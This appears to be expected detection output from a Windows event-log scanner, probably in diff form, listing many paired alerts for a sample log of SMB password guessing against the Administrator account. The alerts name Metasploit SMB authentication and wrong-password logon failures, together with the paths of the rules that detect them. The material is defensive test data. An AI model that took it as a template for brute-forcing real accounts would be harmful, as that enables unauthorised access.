+2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bhPNRHWhTyonDPuA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zEsnyWpUuHVBo6et  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I2FwaWy9TALkk9eU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fuikeQsxlOUVifVj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZWdsRJp9fHypPI1d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B0j0IBX2eZnx99n9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YIZ5Knxg0xr0WmDb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wuej3f7mEoWmd4SX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B0LcCi06ilIhFPwb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jWsCGgoFmH06rRf4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bP47JjNKqtYIZPsC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mNlWZ9o0xf7bl2d0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hnPnB2lEN3BSDpXJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dVMyeF9jGuzHkTHg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sDKLl3PjW2qrzJGa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rkllnePSq3NQ5wgC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j9qLWgQnR7P9cs7s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C1AdU07nzvv7RB2i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cHgiB5SMiQtsl5oD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 03e7QOn36l0jH35H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DoJBywV8x8cURwrO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SDYGYO6s6g6Dbx8r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nUqXpeTNePFyBmCo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T2h0qJWcbzRe1GSj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: edsfNOovOl1Ow503  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cxCC83XLMIJrNMvl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MzussOcg5ihdrnD0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 55l4HKICu8x0FpQv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5GmlVWDjZ75tT08G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o6v1DkuFvB04PESQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VTLdNb0XbzXuLi51  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CSjDYb1BhHC9UTxO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V1yLH19VsfLx9BGF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X4AVhjdz9yHsfss0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bqWLOKaKwS8VBxDj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EjK8A8DTSYursBzj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UaDCKPslwRaLBWtH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xAvoekviFDSAIgBe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3XOmFwh8IamESWCM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 54GbW769j1x27mrI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bZSkhwZXc1SSknDT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 05AuqlN44x7oJGoi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RQ4A6ReTVTcFCFeN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T7U6i4CMrL0bHouf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NaeA4uZ6o8BRbzwf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
